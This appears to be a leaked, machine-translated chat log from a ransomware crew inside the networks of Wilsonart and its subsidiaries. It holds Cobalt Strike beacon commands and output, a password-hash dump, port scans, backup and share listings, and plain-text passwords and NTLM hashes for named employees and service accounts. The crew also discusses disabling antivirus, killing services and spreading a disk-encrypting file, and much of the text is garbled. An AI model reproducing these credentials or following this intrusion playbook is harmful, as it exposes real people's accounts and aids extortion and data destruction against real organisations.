uk.Wilsonart.com srv: 1 / 1 ``` it's actually this ``` cn.Wilsonart.com srv: 1 / 1 ``in a nutshell the algorithm is like this ``rfr nj nfrsharpsharesng ips list.txt --alive -exec pull.By the way how do you solve the mass spreading of the eche? 
WI.RWP.COM srv: / 60 arm: / 515 polyrey.net srv: 53 / 64 arm: 45 / 340 eu.Wilsonart.com srv: 36 / 43 arm: 2 / 10 resopal.lan srv: 26 / 27 arm: 11 / 100 uk.Wilsonart.com srv: 22 / 25 arm: 44 / 157 ``These 5 can be drawn from others. BUSHBOARD.CO.UK srv: 10 / 17 arm: 26 / 136 arborite.com srv: 9 / 12 arm: 29 / 154 SLF.LOCAL srv: 8 / 10 arm: 49 / 66 ralpwilson.com srv: 1 / 1 uk.Wilsonart.com srv: 1 / 1 ``Map the servers unreachable, tasklist cut off the crisis services and while scattering attract other domains then scatter the file that will shasharit disks and stuff on armasperechtalivayut itdasy question) with small or large domain will start?they were not, but I'll walk to be sure on the classic drop snaps if any then skipkey (we sent a broadcast but no one woke up check on the default settings yesvole in biose should be turned on, right?yes you can go there quietly as you turn it off from the main domain in that domain found7 from other domains can only see the dkpod YES of the entrance domain have access thereto from another domain to mask its serverspolozhdeny trust has anything with anything? WI.RWP.COM srv: / 60 arm: / 515 ``Let's think about merging Directory of \BBDC03.bushboard.co.uk\Bushboard Backups\Backup 21/10/2020 21:25 . 21/10/2020 21:25 . 21/10/2020 21:25 11,334 Backup.vbm 21/10/2020 21:25 357,040,234,496 BackupD2020-10-21T204800_278E.vbk 2 File(s) 357,040,245,830 bytes 2 Dir(s) 7,410,316,644,352 bytes free ``` ``` Directory of \BBDC03.bushboard.co.uk\Bushboard Backups\Daily 26/12/2020 21:22 . 26/12/2020 21:22 . 
26/12/2020 21:22 277,452 Daily.vbm 26/12/2020 21:19 8,877,858,816 DailyD2020-12-22T210026_0A86.vrb 26/12/2020 21:20 5,325,545,472 DailyD2020-12-23T210030_4C1A.vrb 26/12/2020 21:22 3,240,009,728 DailyD2020-12-24T210037_9249.vrb 26/12/2020 21:22 2,230,308,864 DailyD2020-12-25T210022_FD90.vrb 26/12/2020 21:22 989,772,115,968 DailyD2020-12-26T210030_B7DE.vbk 6 File(s) 1,009,446,116,300 bytes 2 Dir(s) 7,410,316,644,352 bytes free ``` ``` Directory of \BBDC03.bushboard.co.uk\Bushboard Backups\Full Backup 10/10/2020 21:35 . 10/10/2020 21:35 . 10/10/2020 21:35 1,952 Full Backup.vbm 1 File(s) 1,952 bytes 2 Dir(s) 7,410,316,644,352 bytes free ``` ``` Directory of \BBDC03.bushboard.co.uk\Bushboard Backups\VCenter 26/12/2020 20:05 . 26/12/2020 20:05 . 26/12/2020 20:05 366,006 VCenter.vbm 12/12/2020 20:04:21,046,738,944 VCenterD2020-12-12T200342_5ADE.vbk 13/12/2020 20:03 709,451,776 VCenterD2020-12-13T200034_237F.vib 14/12/2020 20:03 740,597,760 VCenterD2020-12-14T200031_7C1E.vib 15/12/2020 20:03 716,304,384 VCenterD2020-12-15T200029_B706.vib 16/12/2020 20:03 731,889,664 VCenterD2020-12-16T200028_8B8F.vib 17/12/2020 20:03 786,378,752 VCenterD2020-12-17T200033_E75E.vib 18/12/2020 20:03 719,417,344 VCenterD2020-12-18T200017_4E4C.vib 19/12/2020 20:04 22,938,509,312 VCenterD2020-12-19T200341_5DF3.vbk 20/12/2020 20:03 777,809,920 VCenterD2020-12-20T200031_A2E8.vib 21/12/2020 20:03 726,798,336 VCenterD2020-12-21T200035_AF2A.vib 22/12/2020 20:03 764,702,720 VCenterD2020-12-22T200039_2DFC.vib 23/12/2020 20:03 750,419,968 VCenterD2020-12-23T200036_9458.vib 24/12/2020 20:03 828,559,360 VCenterD2020-12-24T200021_2518.vib 25/12/2020 20:03 777,314,304 VCenterD2020-12-25T200028_4E96.vib 26/12/2020 20:05 24,845,225,984 VCenterD2020-12-26T200359_13B5.vbk 16 File(s) 77,860,484,534 bytes 2 Dir(s) 7,410,316,644,352 bytes free ``I need to see the files in these folders 21/10/2020 21:25 Backup 26/12/2020 21:22 Daily 10/10/2020 21:35 Full Backup 26/12/2020 20:05 VCenter `````` Directory of 
\BBDC03.bushboard.co.uk\ADMIN$ 23/12/2020 14:04 . 23/12/2020 14:04 . 16/07/2016 13:23 ADFS 07/02/2019 15:13 appcompat 13/10/2020 15:16 application compatibility scripts 28/09/2020 20:12 AppPatch 22/12/2020 14:46 AppReadiness 03/05/2019 07:17 bcastdvr 28/04/2018 05:47 63,488 bfsvc.exe 23/12/2020 09:49 16,588,854 BGInfo.bmp 16/07/2016 13:23 Boot 16/07/2016 13:23 Branding 23/12/2020 13:45 CbsTemp 03/05/2019 07:17 PM Cluster 03/05/2019 07:16 CSC 16/07/2016 13:23 Cursors 13/08/2019 16:16 436,524 dd_vcredistMSI13B4.txt 23/12/2020 14:04 423,110 dd_vcredistMSI2C36.txt 29/10/2020 16:36 582,720 dd_vcredistMSI576D.txt 29/10/2020 16:45 582,726 dd_vcredistMSI5E40.txt 13/08/2019 16:16:13,680 dd_vcredistUI13B4.txt 23/12/2020 14:04 30,450 dd_vcredistUI2C36.txt 29/10/2020 16:36 46,300 dd_vcredistUI576D.txt 29/10/2020 16:45 46,300 dd_vcredistUI5E40.txt 20/11/2016 18:17 de-DE 02/08/2019 09:39 debug 21/05/2019 04:02:02 232,960 DfsrAdmin.exe 20/06/2019 10:56 1,315 DfsrAdmin.exe.config 16/07/2016 13:23 diagnostics 20/11/2016 18:17 digitalLocker 16/07/2016 13:23 drivers 06/12/2018 16:27 4,056 DtcInstall.log 06/12/2018 17:21 en-GB 01/03/2019 13:30 en-US 06/08/2020 22:54 4,674,784 explorer.exe 16/07/2016 13:23 GameBarPresenceWriter 16/07/2016 13:23 Globalization 20/11/2016 18:17 Help 03/06/2017 08:52 975,872 HelpPane.exe 16/07/2016 13:18 18,432 hh.exe 01/03/2019 14:19:94,567 iis.log 03/05/2019 07:17 IME 28/09/2020 20:12 ImmersiveControlPanel 22/12/2020 14:38 INF 16/07/2016 13:23 InfusedApps 16/07/2016 13:23 InputMethod 16/07/2016 13:23 L2Schemas 18/07/2019 13:35 LiveKernelReports 14/02/2019 17:31 Logs 20/11/2016 09:52 1,340 lsasetup.log 29/05/2019 12:24 AM LSDeployment 16/07/2016 13:18 43,131 mib.bin 26/12/2020 09:51 Microsoft.NET 16/07/2016 13:23 Migration 03/05/2019 07:17 MiracastView 16/07/2016 13:23 ModemLogs 16/07/2016 13:19 243,200 notepad.exe 19/07/2019 10:05 467,492 ntbtlog.txt 13/08/2019 08:54 OCR 10/11/2020 15:39:405 ODBC.INI 02/08/2019 16:01 469 ODBCINST.INI 16/07/2016 13:23 
Offline Web Pages 06/12/2018 16:27 Panther 16/07/2016 13:23 Performance 09/12/2020 09:07 2,614,310 PFRO.log 16/07/2016 13:23 PLA 28/09/2020 20:12 PolicyDefinitions 09/12/2020 09:08 prefetch 03/05/2019 07:17 PrintDialog 16/07/2016 13:23 Provisioning 13/10/2020 15:15 rdcbDb 04/03/2017 06:18 320,512 regedit.exe 01/03/2019 14:15 AM Registration 13/10/2020 15:15 RemotePackages 11/11/2020 09:08 AM rescache 16/07/2016 13:23 Resources 16/07/2016 13:23 SchCache 16/07/2016 13:23 schemas 16/07/2016 13:23 security 16/07/2016 13:19 28,777 ServerStandard.xml 20/11/2016 09:52 serviceProfiles 28/09/2020 20:12 servicing 16/07/2016 13:25 Setup 22/12/2020 14:38 12,560 setupact.log 20/11/2016 18:53 0 setuperr.log 13/02/2020 14:52 ShellExperiences 16/07/2016 13:23 SKB 06/12/2018 21:44 SoftwareDistribution 16/07/2016 13:23 Speech 16/07/2016 13:23 Speech_OneCore 08/07/2020 06:58 131,584 splwow64.exe 16/07/2016 13:23 System 16/07/2016 13:219 system.ini 22/12/2020 14:38 System32 16/07/2016 13:23 SystemApps 16/07/2016 13:23 SystemResources 23/12/2020 14:03 SysWOW64 23/12/2020 10:58 PM TAPI 20/11/2016 18:53 Tasks 27/12/2020 02:59 Temp 16/07/2016 13:23 tracing 16/07/2016 13:23 twain_32 16/07/2016 13:20 66,560 twain_32.dll 06/12/2018 17:12 Veeam 16/07/2016 13:23 Vss 13/10/2020 15:16 Web 02/08/2019 14:30 WID 16/07/2016 13:21 92 win.ini 27/12/2020 00:20 275 WindowsUpdate.log 16/07/2016 13:19 10:240 winhlp32.exe 23/12/2020 14:04 WinSxS 16/07/2016 13:18 316,640 WMSysPr9.prx 16/07/2016 13:18 11,264 write.exe 36 File(s) 29,085,208 bytes 77 Dir(s) 1,017,358,946,304 bytes free ``` ``` Directory of \BBDC03.bushboard.co.uk\Bushboard Backups 26/12/2020 05:13 . 26/12/2020 05:13 . 
```
21/10/2020  21:25    Backup
26/12/2020  21:22    Daily
10/10/2020  21:35    Full Backup
21/10/2020  11:52    Test
21/10/2020  11:43 PM Test Backup
26/12/2020  20:05    VCenter
               0 File(s)              0 bytes
               8 Dir(s)  7,410,316,644,352 bytes free
```

```
dNSHostName: BBDC03.bushboard.co.uk

Share name         Type  Used as  Comment
-------------------------------------------------------------------------------
ADMIN$             Disk           Remote Admin
Bushboard Backups  Disk
```

```
 Directory of \\BBDC03.bushboard.co.uk\SQL_Server\App\BespokeTables

27/12/2020  01:35    .
27/12/2020  01:35    ..
23/12/2020  00:10     7,077,051,904 BespokeTables_backup_2020_12_23_000101_4310632.bak
24/12/2020  00:10     7,077,051,904 BespokeTables_backup_2020_12_24_000101_1575132.bak
25/12/2020  00:10     7,077,051,904 BespokeTables_backup_2020_12_25_000100_9237608.bak
26/12/2020  00:10     7,077,051,904 BespokeTables_backup_2020_12_26_000101_3225660.bak
27/12/2020  00:10     7,077,051,904 BespokeTables_backup_2020_12_27_000101_3078025.bak
               5 File(s)    35,385,259,520 bytes
               2 Dir(s)  4,194,904,961,024 bytes free
```

```
 Directory of \\BBDC03.bushboard.co.uk\SQL_Server\App\DataAnalysis

27/12/2020  01:35    .
27/12/2020  01:35    ..
23/12/2020  00:10        14,766,592 DataAnalysis_backup_2020_12_23_000101_5246638.bak
24/12/2020  00:10        14,766,592 DataAnalysis_backup_2020_12_24_000101_2199136.bak
25/12/2020  00:10        14,766,592 DataAnalysis_backup_2020_12_25_000100_9861612.bak
26/12/2020  00:10        14,766,592 DataAnalysis_backup_2020_12_26_000101_3849664.bak
27/12/2020  00:10        14,766,592 DataAnalysis_backup_2020_12_27_000101_3546028.bak
               5 File(s)        73,832,960 bytes
               2 Dir(s)  4,194,904,961,024 bytes free
```

```
 Directory of \\BBDC03.bushboard.co.uk\SQL_Server\App\distribution

27/12/2020  01:35    .
27/12/2020  01:35    ..
23/12/2020  00:10         5,399,040 distribution_backup_2020_12_23_000101_5246638.bak
24/12/2020  00:10         5,399,040 distribution_backup_2020_12_24_000101_2199136.bak
25/12/2020  00:10         5,399,040 distribution_backup_2020_12_25_000100_9861612.bak
26/12/2020  00:10         5,399,040 distribution_backup_2020_12_26_000101_4005665.bak
27/12/2020  00:10         5,399,040 distribution_backup_2020_12_27_000101_3702029.bak
               5 File(s)        26,995,200 bytes
               2 Dir(s)  4,194,904,961,024 bytes free
```

```
 Directory of \\BBDC03.bushboard.co.uk\SQL_Server\App\ManufacturingDemo

27/12/2020  01:35    .
27/12/2020  01:35    ..
23/12/2020  00:14    23,387,529,728 ManufacturingDemo_backup_202020_12_23_000101_5870642.bak
24/12/2020  00:14    23,387,529,728 ManufacturingDemo_backup_202020_12_24_000101_2355137.bak
25/12/2020  00:14    23,387,529,728 ManufacturingDemo_backup_202020_12_25_000101_0017613.bak
26/12/2020  00:14    23,387,529,728 ManufacturingDemo_backup_202020_12_26_000101_4161666.bak
27/12/2020  00:14    23,387,529,728 ManufacturingDemo_backup_202020_12_27_000101_3702029.bak
               5 File(s)   116,937,648,640 bytes
               2 Dir(s)  4,194,904,961,024 bytes free
```

```
 Directory of \\BBDC03.bushboard.co.uk\SQL_Server\App\ReportServer$CRM

27/12/2020  01:35    .
27/12/2020  01:35    ..
23/12/2020  00:14       694,302,208 ReportServer$CRM_backup_2020_12_23_000101_7898655.bak
24/12/2020  00:14       697,447,936 ReportServer$CRM_backup_2020_12_24_000101_2355137.bak
25/12/2020  00:14       697,447,936 ReportServer$CRM_backup_2020_12_25_000101_0017613.bak
26/12/2020  00:14       696,399,360 ReportServer$CRM_backup_2020_12_26_000101_4161666.bak
27/12/2020  00:14       694,302,208 ReportServer$CRM_backup_2020_12_27_000101_3858030.bak
               5 File(s)     3,479,899,648 bytes
               2 Dir(s)  4,194,904,961,024 bytes free
```

```
 Directory of \\BBDC03.bushboard.co.uk\SQL_Server\App\ReportServer$CRMTempDB

27/12/2020  01:35    .
27/12/2020  01:35    ..
23/12/2020  00:14        23,332,352 ReportServer$CRMTempDB_backup_2020_12_23_000101_8054656.bak
24/12/2020  00:14        21,235,200 ReportServer$CRMTempDB_backup_2020_12_24_000101_2355137.bak
25/12/2020  00:14        22,283,776 ReportServer$CRMTempDB_backup_2020_12_25_000101_0173614.bak
26/12/2020  00:14        21,235,200 ReportServer$CRMTempDB_backup_2020_12_26_000101_4317667.bak
27/12/2020  00:14        21,235,200 ReportServer$CRMTempDB_backup_2020_12_27_000101_3858030.bak
               5 File(s)       109,321,728 bytes
               2 Dir(s)  4,194,904,961,024 bytes free
```

```
 Directory of \\BBDC03.bushboard.co.uk\SQL_Server\App\SP2010_Admin_Content

27/12/2020  01:35    .
27/12/2020  01:35    ..
23/12/2020  00:14       354,596,352 SP2010_Admin_Content_backup_2020_12_23_000101_9458665.bak
24/12/2020  00:14       354,596,352 SP2010_Admin_Content_backup_2020_12_24_000101_2511138.bak
25/12/2020  00:14       354,596,352 SP2010_Admin_Content_backup_2020_12_25_000101_0485616.bak
26/12/2020  00:14       354,596,352 SP2010_Admin_Content_backup_2020_12_26_000101_4473668.bak
27/12/2020  00:14       354,596,352 SP2010_Admin_Content_backup_2020_12_27_000101_4170032.bak
               5 File(s)     1,772,981,760 bytes
               2 Dir(s)  4,194,904,961,024 bytes free
```

```
 Directory of \\BBDC03.bushboard.co.uk\SQL_Server\App\SP2010_config

27/12/2020  01:35    .
27/12/2020  01:35    ..
23/12/2020  00:14        18,001,408 SP2010_config_backup_202020_12_23_000101_9770667.bak
24/12/2020  00:14        18,001,408 SP2010_config_backup_2020_12_24_000101_2667139.bak
25/12/2020  00:14        18,001,408 SP2010_config_backup_2020_12_25_000101_0641617.bak
26/12/2020  00:14        18,001,408 SP2010_config_backup_2020_12_26_000101_4473668.bak
27/12/2020  00:14        18,001,408 SP2010_config_backup_2020_12_27_000101_4170032.bak
               5 File(s)        90,007,040 bytes
               2 Dir(s)  4,194,904,961,024 bytes free
```

The check in the lab works like a broadcast across the whole network, but it requires the MAC address) https://www.depicus.com/wake-on-lan/wake-on-lan-cmd
user7
user3
Two is not enough; are all of us here?

Please don't forget: servers that will be mapped need to be run with the tasklist section.
We will pull in the trust after turning off the AVs; we'll go there even with the dll from the department. Symantec breaks everything.
2003: nothing flies out there, or something I don't understand.
Some bug or something.
WI.RWP.COM srv: / 60 arm: / 515
Some files you might find interesting, some listings on backups and file servers)

```
beacon> shell dir \\BBDC03.bushboard.co.uk\vCenterBackups
[*] Tasked beacon to run: dir \\BBDC03.bushboard.co.uk\vCenterBackups
[+] host called home, sent: 74 bytes
[+] received output:
 Volume in drive \\BBDC03.bushboard.co.uk\vCenterBackups is Backup of VSphere
 Volume Serial Number is 34A9-AA2B

 Directory of \\BBDC03.bushboard.co.uk\vCenterBackups

23/10/2020  13:32    .
23/10/2020  13:32    ..
               0 File(s)              0 bytes
               2 Dir(s)  7,410,316,644,352 bytes free
```

```
beacon> shell dir \\BBDC03.bushboard.co.uk\SQL_Server
[*] Tasked beacon to run: dir \\BBDC03.bushboard.co.uk\SQL_Server
[+] host called home, sent: 70 bytes
[+] received output:
 Volume in drive \\BBDC03.bushboard.co.uk\SQL_Server is New Volume
 Volume Serial Number is 5A0C-69A2

 Directory of \\BBDC03.bushboard.co.uk\SQL_Server

22/08/2019  13:16    .
22/08/2019  13:16    ..
09/08/2019  15:38    App
09/08/2019  15:57    Sys
               0 File(s)              0 bytes
               4 Dir(s)  4,194,904,961,024 bytes free
```

```
beacon> shell dir \\BBDC03.bushboard.co.uk\SQL_Server\App
[*] Tasked beacon to run: dir \\BBDC03.bushboard.co.uk\SQL_Server\App
[+] host called home, sent: 74 bytes
[+] received output:
 Volume in drive \\BBDC03.bushboard.co.uk\SQL_Server is New Volume
 Volume Serial Number is 5A0C-69A2

 Directory of \\BBDC03.bushboard.co.uk\SQL_Server\App

09/08/2019  15:38    .
09/08/2019  15:38    ..
27/12/2020  01:35    A_Winman
27/12/2020  01:35 PM BBHoldings
27/12/2020  01:35 PM Bdc_Service_DB_aff7f39f8b654700a677cbcc4c641655
27/12/2020  01:35 PM BespokeTables
27/12/2020  01:35    DataAnalysis
27/12/2020  01:35    distribution
27/12/2020  01:35    ManufacturingDemo
27/12/2020  01:35    ReportServer$CRM
27/12/2020  01:35    ReportServer$CRMTempDB
27/12/2020  01:35    SP2010_Admin_Content
27/12/2020  01:35    SP2010_config
27/12/2020  01:35    WinMan
27/12/2020  01:35    WinManMaster
27/12/2020  01:35    WSS_Content
27/12/2020  01:35 PM WSS_Content_5eddefdaf170489fac09efbaa04bc6ed
27/12/2020  01:35 PM WSS_Content_704c79658cf640d5a47ca3fd6e902911
27/12/2020  01:35 PM WSS_Logging
27/12/2020  01:35    WSS_Search_bbdb01
               0 File(s)              0 bytes
              20 Dir(s)  4,194,904,961,024 bytes free
```

```
beacon> shell dir \\BBDC03.bushboard.co.uk\SQL_Server\Sys
[*] Tasked beacon to run: dir \\BBDC03.bushboard.co.uk\SQL_Server\Sys
[+] host called home, sent: 74 bytes
[+] received output:
 Volume in drive \\BBDC03.bushboard.co.uk\SQL_Server is New Volume
 Volume Serial Number is 5A0C-69A2

 Directory of \\BBDC03.bushboard.co.uk\SQL_Server\Sys

09/08/2019  15:57    .
```
09/08/2019 15:57 . 27/12/2020 01:30 master 27/12/2020 01:30 model 27/12/2020 01:30 msdb 0 File(s) 0 bytes 5 Dir(s) 4,194,904,961,024 bytes free ``Listing of these dirs`` dNSHostName: BBDC03.bushboard.co.uk Share name Type Used as Comment ------------------------------------------------------------------------------- ADMIN$ Disk Remote Admin Bushboard Backups Disk C$ Disk Default share E$ Disk Default share F$ Disk Default share IPC$ IPC Remote IPC iTop-2.6.1-4463 Disk log Disk SQL_Server Disk U$ Disk Default share UpdateServicesPackages Disk A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system. VBRCatalog Disk vCenterBackups Disk WsusContent Disk A network share to be used by Local Publishing to place published content on this WSUS system. WSUSTemp Disk A network share used by Local Publishing from a Remote WSUS Console Instance. ``` SQL_Server The printerBackup, which will be pkv inet software[ ](https://mediaeveryone.com/group/wilsonart-com?msg=ChphJoH4mMpmgKttk) raised and scored, only about the batnick then there was talk and how to make it too `` `` >description: VMware vCenter 6.0 Server >operatingSystem: Windows Server 2012 R2 Datacenter >dNSHostName: dcwas79.Wilsonart.com login: fowlerh@wilsonart.com paswd: R3f1nn3j2! 
Share name Type Used as Comment ---------------------------------------- ADMIN$ Disk Remote Admin C$ Disk Default share D$ Disk Default share IPC$ IPC Remote IPC 170.7.76.79:5985 170.7.76.79:3389 170.7.76.79:636 170.7.76.79:514 170.7.76.79:443 170.7.76.79:389 170.7.76.79:139 170.7.76.79:135 170.7.76.79:88 170.7.76.79:80 >description: Veeam Backup Server >operatingSystem: Windows Server 2016 Standard >dNSHostName: dcveeam01.Wilsonart.com Share name Type Used as Comment ---------------------------------------- ADMIN$ Disk Remote Admin C$ Disk Default share F$ Disk Default share IPC$ IPC Remote IPC >description: Symantec End Point Management Server >operatingSystem: Windows Server 2012 Standard >dNSHostName: DCWAS45.Wilsonart.com login: admin paswd: pRe1Udlp! Share name Type Used as Comment ------------------------------------------ ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC print$ Disk Printer Drivers >description: PROD Symantec AntiVirus Management Server >operatingSystem: Windows Server 2012 Standard >dNSHostName: FLWAS03.Wilsonart.com net view \FLWAS03.Wilsonart.com /all System error 53 has occurred. The network path was not found. Ping statistics for 170.7.20.198: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 170.7.20.198:53161 170.7.20.198:49154 170.7.20.198:49153 170.7.20.198:9090 170.7.20.198:8446 170.7.20.198:8445 170.7.20.198:8443 170.7.20.198:8014 170.7.20.198:8008 170.7.20.198:8006 170.7.20.198:5985 170.7.20.198:5060 170.7.20.198:3389 170.7.20.198:2000 170.7.20.198:1611 170.7.20.198:1610 170.7.20.198:1100 170.7.20.198:143 170.7.20.198:139 170.7.20.198:135 170.7.20.198:110 170.7.20.198:80 170.7.20.198:25 170.7.20.198:21 >description: Vcenter Server >dNSHostName: bod01-vce01.eu.wilsonart.com net view \bod01-vce01.eu.wilsonart.com /all System error 53 has occurred. The network path was not found. 
Ping statistics for 10.40.60.70: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 10.40.60.70:9443 10.40.60.70:9087 10.40.60.70:9084 10.40.60.70:8084 10.40.60.70:8008 10.40.60.70:7444 10.40.60.70:5580 10.40.60.70:5480 10.40.60.70:5060 10.40.60.70:2020 10.40.60.70:2015 10.40.60.70:2014 10.40.60.70:2012 10.40.60.70:2000 10.40.60.70:1514 10.40.60.70:636 10.40.60.70:514 10.40.60.70:443 10.40.60.70:389 10.40.60.70:110 10.40.60.70:88 10.40.60.70:80 10.40.60.70:25 10.40.60.70:21 >description: Veeam Backup Server >operatingSystem: Windows Server 2016 Standard >dNSHostName: bod01-bkp01.eu.Wilsonart.com login: eu.wilsonart.com\svcveeam NTLM: 0e7674530ce330128b4425c70fb97f92 Share name Type Used as Comment ---------------------------------------------- ADMIN$ Disk Remote Admin C$ Disk Default share D$ Disk Default share F$ Disk Default share IPC$ IPC Remote IPC R$ Disk Default share V$ Disk Default share veeam_agent_ISOs Disk W$ Disk Default share X$ Disk Default share bod01-bkp01.eu.Wilsonart.com:5989 bod01-bkp01.eu.Wilsonart.com:5985 bod01-bkp01.eu.Wilsonart.com:3389 bod01-bkp01.eu.Wilsonart.com:139 bod01-bkp01.eu.Wilsonart.com:135 bod01-bkp01.eu.Wilsonart.com:111 bod01-bkp01.eu.Wilsonart.com:110 bod01-bkp01.eu.Wilsonart.com:80 bod01-bkp01.eu.Wilsonart.com:53 bod01-bkp01.eu.Wilsonart.com:25 (220 bod01-bkp01.eu.wilsonart.com Microsoft ESMTP MAIL Service, Version: 10.0.14393.0 ready at Sat, 26 Dec 2020 19:58:41 +0100 ) bod01-bkp01.eu.Wilsonart.com:21 (220 Microsoft FTP Service) bod01-bkp01.eu.Wilsonart.com:445 (platform: 500 version: 10.0 name: BOD01-BKP01 domain: EU) >dNSHostName: nas_signature.polyrey.net Share name Type Used as Comment ------------------------------------------------ Archives_Outlook Disk Astier Disk CALDERA_RIPS Disk Depot Disk Design Library Disk INFO Disk IPC$ IPC IPC Service () PROJETS_Signature Disk Signature_PAO Disk TEST_JFC Disk Users_Archives Disk Users_Archives 172.25.168.64:6281 172.25.168.64:5001 172.25.168.64:5000 172.25.168.64:548 
```
172.25.168.64:443
172.25.168.64:139
172.25.168.64:80
172.25.168.64:445 (platform: 500 version: 6.1 name: NAS_SIGNATURE domain: POLYREY)
```

```
>description: virtual on VMware (Win 10)
>operatingSystem: Windows 10 Pro
>dNSHostName: VIPW7700.resopal.lan
net view \\VIPW7700.resopal.lan /all
System error 53 has occurred.
The network path was not found.
Reply from 172.22.198.250: Destination host unreachable.
Ping statistics for 172.22.190.190:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
172.22.198.250:541
172.22.198.250:443
172.22.198.250:22 (SSH-2.0-U_fcWc)
```

```
>operatingSystem: Windows 7 Professional
>dNSHostName: BBBACKUP.bushboard.co.uk
Ping request could not find host BBBACKUP.bushboard.co.uk. Please check the name and try again.
```

```
>description: Backup Server
>operatingSystem: Windows Server 2012 Datacenter
>servicePrincipalName: MSSQLSvc/BBBK01.bushboard.co.uk:VEEAMSQL2012
>dNSHostName: BBBK01.bushboard.co.uk
Ping statistics for 2002:c001:147::c001:147:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
```

```
>operatingSystem: Windows Server 2012 Datacenter
>servicePrincipalName: MSSQLSvc/testmove.bushboard.co.uk:VEEAMSQL2012
>dNSHostName: testmove.bushboard.co.uk
Ping statistics for 2002:c001:15c::c001:15c:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
```

```
>operatingSystem: Windows Server 2016 Standard
>servicePrincipalName: MSSQLSvc/BBDC03.bushboard.co.uk:VEEAMSQL2012
>servicePrincipalName: MSSQLSvc/BBDC03.bushboard.co.uk:VEEAMSQL2016
>dNSHostName: BBDC03.bushboard.co.uk

Share name               Type  Used as  Comment
-------------------------------------------------------------------------------
ADMIN$                   Disk           Remote Admin
Bushboard Backups        Disk
C$                       Disk           Default share
E$                       Disk           Default share
F$                       Disk           Default share
IPC$                     IPC            Remote IPC
iTop-2.6.1-4463          Disk
log                      Disk
SQL_Server               Disk
U$                       Disk           Default share
UpdateServicesPackages   Disk           A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
```
VBRCatalog Disk vCenterBackups Disk WsusContent Disk A network share to be used by Local Publishing to place published content on this WSUS system. WSUSTemp Disk A network share used by Local Publishing from a Remote WSUS Console Instance. >operatingSystem: unknown >dNSHostName: ltn01-vcenter01.bushboard.co.uk Ping statistics for 2002:c001:111::c001:111: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), So the rtcompany has raised the question) so we were not told we needed it yet have a backup server listing prepared? Live Computers: Wilsonart.com srv: 128 / 141 arm: 676 / 2587 uk.Wilsonart.com srv: 22 / 25 arm: 44 / 157 eu.Wilsonart.com srv: 36 / 43 arm: 2 / 10 uk.Wilsonart.com srv: 1 / 1 WI.RWP.COM srv: / 60 arm: / 515 SLF.LOCAL srv: 8 / 10 arm: 49 / 66 resopal.lan srv: 26 / 27 arm: 11 / 100 ralpwilson.com srv: 1 / 1 polyrey.net srv: 53 / 64 arm: 45 / 340 BUSHBOARD.CO.UK srv: 10 / 17 arm: 26 / 136 arborite.com srv: 9 / 12 arm: 29 / 154 ``We'll still ave to disconnectHow about a new clean coba? We're doping and ready to go`` bod01-bkp01.eu.Wilsonart.com (via 445) login: eu.wilsonart.com\svcveeam NTLM: 0e7674530ce330128b4425c70fb97f92 `````` ukwavcsa1.uk.wilsonart.com admin.ychang 12Pa$w0rd. ``fuck. here we had two spheres in europe # we went into them # one is metrovaya, the other, as we assumed no snapshots they fly off to the backup server on the vinda's 12Pa$$w0rd ``` admin.ychang 8af4a85a0c80719d98341961187c81fd `````` eu.Wilsonart.com\Grelles2 Azerty02 `````` eu.Wilsonart.com\blanchp2 Chloe2019 ``petsnashli? So what``` >description: Vcenter Server >dNSHostName: bod01-vce01.eu.wilsonart.com net view \bod01-vce01.eu.wilsonart.com /all System error 53 has occurred. The network path was not found. 
Ping statistics for 10.40.60.70: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 10.40.60.70:9443 10.40.60.70:9087 10.40.60.70:9084 10.40.60.70:8084 10.40.60.70:8008 10.40.60.70:7444 10.40.60.70:5580 10.40.60.70:5480 10.40.60.70:5060 10.40.60.70:2020 10.40.60.70:2015 10.40.60.70:2014 10.40.60.70:2012 10.40.60.70:2000 10.40.60.70:1514 10.40.60.70:636 10.40.60.70:514 10.40.60.70:443 10.40.60.70:389 10.40.60.70:110 10.40.60.70:88 10.40.60.70:80 10.40.60.70:25 10.40.60.70:21 `````` resopal.lan\Metzler CN=Backup Operators Netz_1020 resopal.lan\Chang CN=Backup Operators 99Lustballons! `````` polyrey.net\Grellety CN=Admin_VCENTER Polyrey70 polyrey.net\Blanchard CN=Admin_VCENTER Louanne50 `````` eu.Wilsonart.com\bod01.svc.vcenter Jupit3r= ```:space_invader:hello allGood eveningXDa said so)Fuck... You say that))) may be rolled and the other pk from your group Admin:1001:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865::: the pc group you are sitting on now I do not understand what group you are talking aboutthis Admin account should roll on this group in fact the pc group look at the car which you sit nowsostav in the local admins? and soot in the pc in this groupa try to check Admin through smb login as local admin here misset (` `) beacon> hashdump [*] Tasked beacon to dump hashes [+] host called home, sent: 82501 bytes [+] received password hashes: Admin:1001:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865::: Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:07b16da56f8d9389b7e093bab1b90983::: ``Handsome man'') +sploit? 
